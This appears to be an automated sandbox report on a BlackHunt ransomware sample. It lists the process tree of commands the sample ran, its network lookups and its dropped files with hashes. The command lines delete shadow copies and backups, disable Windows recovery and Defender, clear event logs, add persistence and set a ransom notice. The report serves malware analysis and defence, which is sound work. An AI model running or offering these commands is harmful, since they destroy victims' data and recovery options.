                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                    2⤵
                                                                      PID:2656
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                      2⤵
                                                                        PID:952
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:3028
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                                          2⤵
                                                                            PID:2104
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:2976
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                                                              2⤵
                                                                                PID:936
                                                                                • C:\Windows\system32\fsutil.exe
                                                                                  fsutil usn deletejournal /D F:\
                                                                                  3⤵
                                                                                  • Enumerates connected drives
                                                                                  PID:2832
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                                                                2⤵
                                                                                  PID:2508
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                                                                                  2⤵
                                                                                    PID:2224
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                                                                                    2⤵
                                                                                      PID:2768
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                                                      2⤵
                                                                                        PID:2604
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2608
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1972
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2200
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1976
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                        2⤵
                                                                                          PID:1984
                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                            bcdedit /set {default} recoveryenabled No
                                                                                            3⤵
                                                                                            • Modifies boot configuration data using bcdedit
                                                                                            PID:4072
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                          2⤵
                                                                                            PID:3304
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                              3⤵
                                                                                                PID:3840
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                              2⤵
                                                                                                PID:3592
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                  3⤵
                                                                                                    PID:3848
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"
                                                                                                  2⤵
                                                                                                  • Deletes itself
                                                                                                  PID:3872
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
                                                                                                  2⤵
                                                                                                    PID:3764
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                    2⤵
                                                                                                      PID:3600
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                                      2⤵
                                                                                                        PID:3804
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                        2⤵
                                                                                                          PID:3048
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                          2⤵
                                                                                                            PID:3904
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [w4ifO5uDw@gmail.com] AND [Teikobest@gmail.com] " /f
                                                                                                            2⤵
                                                                                                              PID:3556
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                              2⤵
                                                                                                                PID:3320
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                                2⤵
                                                                                                                  PID:3284
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                  2⤵
                                                                                                                    PID:2788
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                    2⤵
                                                                                                                      PID:3124
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                      2⤵
                                                                                                                        PID:3272
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
                                                                                                                        2⤵
                                                                                                                          PID:236
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                                                                          2⤵
                                                                                                                            PID:1068
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                                                            2⤵
                                                                                                                            • Modifies registry class
                                                                                                                            PID:2880
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                                                            2⤵
                                                                                                                              PID:3544
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                                                              2⤵
                                                                                                                                PID:3932
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
                                                                                                                                2⤵
                                                                                                                                  PID:2876
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
                                                                                                                                  2⤵
                                                                                                                                    PID:1084
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
                                                                                                                                    2⤵
                                                                                                                                      PID:936
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                                                                                                                                    1⤵
                                                                                                                                      PID:2660
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                                                      1⤵
                                                                                                                                        PID:560
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:1680
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                                                                                          2⤵
                                                                                                                                            PID:2880
                                                                                                                                            • C:\Windows\system32\wevtutil.exe
                                                                                                                                              wevtutil.exe cl Application
                                                                                                                                              3⤵
                                                                                                                                              • Clears Windows event logs
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3632
                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                          vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                                          1⤵
                                                                                                                                          • Enumerates connected drives
                                                                                                                                          • Interacts with shadow copies
                                                                                                                                          PID:1172
                                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                                          vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                                                          1⤵
                                                                                                                                          • Interacts with shadow copies
                                                                                                                                          PID:2708
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                          1⤵
                                                                                                                                            PID:2592
                                                                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                                                                            bcdedit /set {default} recoveryenabled No
                                                                                                                                            1⤵
                                                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                                                            PID:1968
                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                            vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                                            1⤵
                                                                                                                                            • Interacts with shadow copies
                                                                                                                                            PID:2016
                                                                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                                                                            bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                            1⤵
                                                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                                                            PID:1444
                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2520
                                                                                                                                          • C:\Windows\system32\wbengine.exe
                                                                                                                                            "C:\Windows\system32\wbengine.exe"
                                                                                                                                            1⤵
                                                                                                                                              PID:2532
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                                                                                2⤵
                                                                                                                                                  PID:1772
                                                                                                                                              • C:\Windows\System32\vdsldr.exe
                                                                                                                                                C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:3032
                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                  1⤵
                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                  PID:2388
                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                                                                  1⤵
                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                  PID:904
                                                                                                                                                • C:\Windows\System32\vds.exe
                                                                                                                                                  C:\Windows\System32\vds.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2656
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1160
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2016
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2088
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2752
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                                                                                                            1⤵
                                                                                                                                                              PID:976
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                                                                                                              1⤵
                                                                                                                                                                PID:480
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2268
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2996
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2960
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2968
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1600
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2816
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                            PID:2580
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:2980
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              PID:2644
                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-44608848942226975-1503731876-2120623488-1811277401-12787588531100136051489308905"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2016
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                PID:2636
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                PID:2720
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                PID:2112
                                                                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:3992
                                                                                                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                                                                                                PID:3564
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3748
                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                  PID:1768
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3936
                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                    taskkill /IM mshta.exe /f
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:3772
                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                    ping 127.0.0.1 -n 5
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                    PID:3688
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [w4ifO5uDw@gmail.com] AND [Teikobest@gmail.com] " /f
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3996
                                                                                                                                                                                    • C:\Windows\system32\wbadmin.exe
                                                                                                                                                                                      wbadmin.exe delete catalog -quiet
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Deletes backup catalog
                                                                                                                                                                                      PID:3888
                                                                                                                                                                                    • C:\Windows\system32\notepad.exe
                                                                                                                                                                                      notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3752
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3420
                                                                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                          fsutil.exe usn deletejournal /D C:
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Deletes NTFS Change Journal
                                                                                                                                                                                          PID:3412
                                                                                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                          wevtutil.exe cl Security
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Clears Windows event logs
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:3680
                                                                                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                          wevtutil.exe cl Security /e:false
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Clears Windows event logs
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:2620
                                                                                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                          wevtutil.exe cl Setup
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Clears Windows event logs
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:3776
                                                                                                                                                                                        • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                          wevtutil.exe cl System
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Clears Windows event logs
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:3560
                                                                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                          fsutil usn deletejournal /D M:\
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                          PID:3256
                                                                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                          fsutil usn deletejournal /D C:\
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3268
                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-403818770-5787790301460639591395378841-258613901864365312-1950163681211449463"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                            PID:2708

                                                                                                                                                                                          Network

                                                                                                                                                                                          • flag-us
                                                                                                                                                                                            DNS
                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                            2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
                                                                                                                                                                                            Remote address:
                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                            Request
                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                            IN A
                                                                                                                                                                                            Response
                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                            IN A
                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                          • 208.95.112.1:80
                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                            2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
                                                                                                                                                                                            144 B
                                                                                                                                                                                            52 B
                                                                                                                                                                                            3
                                                                                                                                                                                            1
                                                                                                                                                                                          • 8.8.8.8:53
                                                                                                                                                                                            ip-api.com
                                                                                                                                                                                            dns
                                                                                                                                                                                            2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
                                                                                                                                                                                            56 B
                                                                                                                                                                                            72 B
                                                                                                                                                                                            1
                                                                                                                                                                                            1

                                                                                                                                                                                            DNS Request

                                                                                                                                                                                            ip-api.com

                                                                                                                                                                                            DNS Response

                                                                                                                                                                                            208.95.112.1

                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                          Downloads

                                                                                                                                                                                          • C:\ProgramData\#BlackHunt_Private.key

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            d614d08263661f317a7fb840036d7fc2

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            8bb0aa39cbe5c6f05a7c09845575780f3307a99e

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            f7e2aedda6ce538eaf8194b187b56c7a216dd7dc111b99202086b4586c9cc964

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            f233c8abdb46f06a94fdc96a210b8815406753eca42b58cf3bd2ed98f6ca20d12a70c5136916b2f23bf13535bd41ed72293dd70d15c55e423eb1b7509d670bfa

                                                                                                                                                                                          • C:\ProgramData\#BlackHunt_ReadMe.hta

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            12KB

                                                                                                                                                                                            MD5

                                                                                                                                                                                            40d6bbad804abb45fd92a42b8aa77668

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            b2e9e96828e8a385ebcca22a2c1e571c7183f730

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            3f3c745f7dede01cbfef77fa405bbf7f27301cce8151dc29a2b75f9f086b860f

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            fdb8099ab48a259bdbefaad71640c5505cc56caffda50bebfa2e3d88c91df86235736e0f766ce0f50b7c43c4f0caf41ada871643a361c43f8eff2c7647a28977

                                                                                                                                                                                          • C:\ProgramData\#BlackHunt_ReadMe.txt

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            684B

                                                                                                                                                                                            MD5

                                                                                                                                                                                            85a5c13518f1f6ddefa13598b8bdef33

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            e65c518a0f845fd082c48d4a39682be0cf4b918c

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            5712a2a9d734d4015924c5929376850f5e4cdd63e9a05a644a670d7c8cc93546

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            2e73e4f009769effdbc93f1cbe81972e82627234fdd803e89d71903ec80feee33fb3fb20900b1b2dffee693a49497bf3a1e7853690c2e4392e79d46a5eb33ea2

